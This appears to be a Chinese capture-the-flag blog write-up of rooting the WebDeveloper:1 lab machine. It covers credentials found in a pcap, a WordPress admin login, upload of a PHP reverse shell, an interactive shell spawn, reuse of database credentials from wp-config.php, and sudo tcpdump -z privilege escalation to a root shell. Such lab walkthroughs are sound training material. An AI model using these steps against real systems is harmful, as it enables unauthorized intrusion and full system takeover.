WebDeveloper:1靶机

端口扫描

靶机ip地址为192.168.153.158

目录扫描

访问80端口

拼接访问 /ipdata 发现了一个流量包

放在 wireshark 查看,找到 账号密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接 /wp-login.php

找到登录框

登录成功

找到后台文件上传功能点

利用kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip地址改成kali的ip

上传文件

上传的文件在wp-content/uploads/目录下

kali监听

反弹成功

获得交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/var/www/html/目录下 ,查看 wp-config.php 文件

得到数据库账号密码

账号:webdeveloper

密码:MasterOfTheUniverse

ssh连接 ssh webdeveloper@192.168.153.158

连接成功

sudo提权 sudo -l

找到 php-reverse-shell.php文件位置

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

反弹成功

为root权限

相关推荐
REDcker1 分钟前
Linux 文件描述符与 Socket 选项操作详解
linux·运维·网络
Up九五小庞21 分钟前
用arpspoof实现100%批量切断192.168.110.10 - 192.168.110.100 断网(双向欺骗)--九五小庞
网络·开源
躺柒35 分钟前
读数字时代的网络风险管理:策略、计划与执行04风险指引体系
大数据·网络·信息安全·数字化·网络管理·网络风险管理
Dxy123931021639 分钟前
MySQL如何加唯一索引
android·数据库·mysql
独角鲸网络安全实验室1 小时前
本地信任成“致命漏洞”:数千Clawdbot Agent公网裸奔,供应链与内网安全告急
网络·网关·安全·php·漏洞·clawdbot·信任机制漏洞
ai_xiaogui1 小时前
Tailscale实现家庭与公司网络双向通信教程:子网路由配置详解
网络·tailscale·双向通信·子网路由配置详解·tailscale双向互访
mftang2 小时前
现代互联网安全的基石: SSL/TLS技术介绍
服务器·网络·ssl
坐怀不乱杯魂2 小时前
Linux网络 - 网络层
linux·服务器·网络
Teame_2 小时前
渗透课程学习总结
网络·安全·web安全
千寻技术帮2 小时前
10404_基于Web的校园网络安全防御系统
网络·mysql·安全·web安全·springboot